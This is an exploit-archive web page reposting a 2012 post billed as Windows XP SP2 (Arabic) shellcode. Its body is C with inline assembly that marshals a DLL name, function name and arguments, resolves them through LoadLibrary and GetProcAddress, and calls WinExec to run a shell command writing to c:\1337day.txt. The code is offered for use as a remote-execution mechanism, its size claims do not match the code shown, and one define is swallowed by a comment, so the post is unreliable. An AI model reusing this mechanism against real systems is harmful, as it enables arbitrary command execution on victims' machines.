首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
windows xp sp2 [ arabic] mechanism shellcode 128 bytes+proxy=500bytes
来源:www.facebook.com/fysl.fyslm 作者:TrOoN 发布时间:2012-02-03  
# Title :windows xp sp2 [ arabic]  mechanism  shellcode 128 bytes+proxy=500bytes

# Author :TrOoN

# E-mail : SOUrRce-x@live.fr  |   www.facebook.com/fysl.fyslm

# Home : city 617 logts  : Draria . algeria

# Web Site : www.1337day.com       | 1337Day is ThE best pentes Security

# platform :  WinDows XP sp 2     AraBic    |

# platform i used in this shellcode : Back track 5  | windows xp arabIc sp2

# Type : local exploit /SHELL CODE  /ETc...

#Download link :http://www.microsoft.com

# 1337day sys : mechanism   is  remote system  [shellcode]

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|>

//  if you add proxy ; shellcode 128bytes +  proxy = 500bytes :p
// windows xp sp2 [ arabic]  remote system  mechanism
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int Marshall( unsigned char flags, unsigned size, unsigned char *data,
unsigned char *out, unsigned out_len )
{
out[0] = flags;
*((unsigned *)(&(out[1]))) = size;
memcpy( &(out[5]), data, size );
return size + 5;
}
//////1337 Day shellcode///////////////
//////////////////////////////////////
// Parameter       //////////////////
////////////////////////////////////
// this thing is a pointer to a thing, rather than the thing itself
#define IS_PTR 0x01
// everything is either in, out or in | out
#define IS_IN 0x02
#define IS_OUT 0x04
// null terminated data
#define IS_SZ 0x08
// null short terminated data (e.g. unicode string)define IS_SZZ 0x10
////////////////////////////
// Function       //////////
////////////////////////////
// function is __cdecl (default is __stdcall)
#define FN_CDECL 0x01
int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void
*getproc )
{
// params:
// ebp: dllname
// +4 : fnname
// +8 : num_params
// +12 : out_param_size
// +16 : function_flags
// +20 : params_so_far
// +24 : loadlibrary
// +28 : getprocaddress
// +32 : address of out data buffer
_asm
{
// set up params - this is a little complicated
// due to the fact we’re calling a function with inline asm
push ebp
sub esp, 0x100
mov ebp, esp
mov ebx, dword ptr[ebp+0x158]; // buff
mov dword ptr [ebp + 12], 0;
mov eax, dword ptr [ebp+0x15c];//loadlib
mov dword ptr[ebp + 24], eax;
mov eax, dword ptr [ebp+0x160];//getproc
mov dword ptr[ebp + 28], eax;
mov dword ptr [ebp], ebx; // ebx = dllname
sub esp, 0x800; // give ourselves some data space
mov dword ptr[ebp + 32], esp;
jmp start;
// increment ebx until it points to a ‘0’ byte
skip_string:
mov al, byte ptr [ebx];
cmp al, 0;
jz done_string;
inc ebx;
jmp skip_string;
done_string:
inc ebx;
ret;
start:
// so skip the dll name
call skip_string;
// store function name
mov dword ptr[ ebp + 4 ], ebx
// skip the function name
call skip_string;
// store parameter count
mov ecx, dword ptr [ebx]
mov edx, ecx
mov dword ptr[ ebp + 8 ], ecx
// store out param size
add ebx,4
mov ecx, dword ptr [ebx]
mov dword ptr[ ebp + 12 ], ecx
// store function flags
add ebx,4
mov ecx, dword ptr [ebx]
mov dword ptr[ ebp + 16 ], ecx
add ebx,4
// in this loop, edx holds the num parameters we have left to do.
next_param:
cmp edx, 0
je call_proc
mov cl, byte ptr[ ebx ]; // cl = flags
inc ebx;
mov eax, dword ptr[ ebx ]; // eax = size
add ebx, 4;
mov ch,cl;
and cl, 1; // is it a pointer?
jz not_ptr;
mov cl,ch;
// is it an ‘in’ or ‘inout’ pointer?
and cl, 2;
jnz is_in;
// so it’s an ‘out’
// get current data pointer
mov ecx, dword ptr [ ebp + 32 ]
push ecx
// set our data pointer to end of data buffer
add dword ptr [ ebp + 32 ], eax
add ebx, eax
dec edx
jmp next_param
is_in:
push ebx
// arg is ‘in’ or ‘inout’
// this implies that the data is contained in the received packet
add ebx, eax
dec edx
jmp next_param
not_ptr:
mov eax, dword ptr[ ebx ];
push eax;
add ebx, 4
dec edx
jmp next_param;
 call_proc:

// args are now set up. let’s call...
mov eax, dword ptr[ ebp ];
push eax;
mov eax, dword ptr[ ebp + 24 ];
call eax;
mov ebx, eax;
mov eax, dword ptr[ ebp + 4 ];
push eax;
push ebx;
mov eax, dword ptr[ ebp + 28 ];
call eax; // this is getprocaddress
call eax; // this is our function call
// now we tidy up
add esp, 0x800;
add esp, 0x100;
pop ebp
}
return 1;
}
int main( int argc, char *argv[] )
{
unsigned char buff[ 256 ];
unsigned char *psz;
DWORD freq = 1234;
DWORD dur = 1234;
DWORD show = 0;
HANDLE hk32;
void *loadlib, *getproc;
char *cmd = “cmd /c dir > c:\\1337day.txt”;
psz = buff;
strcpy( psz, “kernel32.dll” );
psz += strlen( psz ) + 1;
strcpy( psz, “WinExec” );
psz += strlen( psz ) + 1;
*((unsigned *)(psz)) = 2; // parameter count
psz += 4;
*((unsigned *)(psz)) = strlen( cmd ) + 1; // parameter size
psz += 4;

// set fn_flags
*((unsigned *)(psz)) = 0;
psz += 4;
psz += Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show,
psz, sizeof( buff ) );
psz += Marshall( IS_PTR | IS_IN, strlen( cmd ) + 1, (unsigned char
*)cmd, psz, sizeof( buff ) );
hk32 = LoadLibrary( “kernel32.dll” );
loadlib = GetProcAddress( hk32, “LoadLibraryA” );
getproc = GetProcAddress( hk32, “GetProcAddress” );
AsmDemarshallAndCall( buff, loadlib, getproc );
return 0;
}

 ########################################### 1337day all  |  ######################################### 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sunway Forcecontrol SNMP NetDB
·frontpage_express2.02 Denial o
·Icona SpA C6 Messenger Downloa
·Mindjet MindManager 2012 10.0.
·OfficeSIP Server 3.1 Denial Of
·Apache httpOnly Cookie Disclos
·NetSarang Xlpd Printer Daemon
·EdrawSoft Office Viewer Compon
·Wireshark 1.4.4 Local Stack Bu
·Adobe Flash Player MP4 Sequenc
·Wireshark 1.4.4 Remote Stack B
·sudo 1.8.0 - 1.8.3p1 Format St
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved